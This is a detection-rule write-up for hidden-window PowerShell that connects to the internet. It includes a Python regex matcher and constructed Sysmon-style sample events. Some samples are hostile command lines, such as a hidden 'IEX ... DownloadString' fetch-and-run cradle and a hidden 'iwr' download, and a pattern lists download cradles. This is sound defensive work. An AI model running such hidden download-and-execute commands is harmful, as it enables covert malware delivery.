
Summary
This detection rule identifies suspicious PowerShell activity in which the `WindowStyle` parameter is used to minimize or hide the command window while the process connects to the internet. Attackers commonly use this to keep their activity out of sight, so it is a potential indicator of malicious intent. The detection draws on telemetry from Endpoint Detection and Response (EDR) products, Sysmon, and Windows Event Logs, tracking command-line executions that match regex patterns characteristic of hidden PowerShell invocations. Recognizing this activity matters because hidden PowerShell sessions can support covert operations such as unauthorized data exfiltration while sidestepping the visibility that standard PowerShell security controls provide. The rule evaluates logs from several telemetry sources so that endpoint activity involving low-visibility PowerShell commands is covered comprehensively.
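As an added illustration of the matching logic the summary describes (not the rule's own regex, which the page does not reproduce), the following Python scans constructed Sysmon-style process-creation events for a PowerShell host launched with a hidden or minimized window together with a network indicator; the prefix list for `-WindowStyle` and the set of network fragments are assumptions.

```python
import re

# Assumed pattern: the PowerShell host binary (powershell.exe or pwsh.exe),
# preceded by a path separator, whitespace, a quote, or the start of the line.
PS_HOST = re.compile(r"(?:^|[\\/\s\"'])(?:powershell|pwsh)(?:\.exe)?\b", re.I)

# -WindowStyle and the prefix abbreviations Windows PowerShell accepts
# (-w, -wi, -win, ...), followed by a value that hides or minimizes the window.
WINDOW_STYLE = re.compile(
    r"[-/]w(?:i(?:n(?:d(?:o(?:w(?:s(?:t(?:y(?:l(?:e)?)?)?)?)?)?)?)?)?)?"
    r"\s+(?:hidden|minimized)\b",
    re.I,
)

# Assumed list of command-line fragments that indicate an outbound connection.
NETWORK = re.compile(
    r"(?:Invoke-WebRequest|\biwr\b|Invoke-RestMethod|\birm\b|Net\.WebClient|"
    r"DownloadString|DownloadFile|Start-BitsTransfer|https?://)",
    re.I,
)


def is_hidden_powershell_network(cmdline: str) -> bool:
    """True when all three conditions hold on one command line."""
    return bool(
        PS_HOST.search(cmdline)
        and WINDOW_STYLE.search(cmdline)
        and NETWORK.search(cmdline)
    )


def scan(events):
    """Return (Image, CommandLine) for every event that triggers the rule."""
    return [(e["Image"], e["CommandLine"]) for e in events
            if is_hidden_powershell_network(e["CommandLine"])]


# Constructed sample events shaped like Sysmon Event ID 1 fields (not real telemetry).
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle Hidden "
                    r"-c \"IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')\""},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -w hidden -nop -c \"iwr http://example.invalid/x -OutFile x.txt\""},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -WindowStyle Hidden -File C:\scripts\cleanup.ps1"},  # no network
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -c \"Invoke-WebRequest https://example.invalid/update\""},  # visible window
    {"Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c echo -w hidden http://example.invalid"},  # not a PowerShell host
]

if __name__ == "__main__":
    for image, cmd in scan(SAMPLE_EVENTS):
        print("ALERT:", image, "|", cmd)
```

The regex only sees the plain command line, so pairing this rule with PowerShell script block logging closes the gap for invocations whose arguments are not visible in the process command line.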
Categories
- Endpoint
Data Sources
- Windows Registry
- Process
- Logon Session
- Application Log
ATT&CK Techniques
- T1059.001
- T1059
Created: 2024-11-13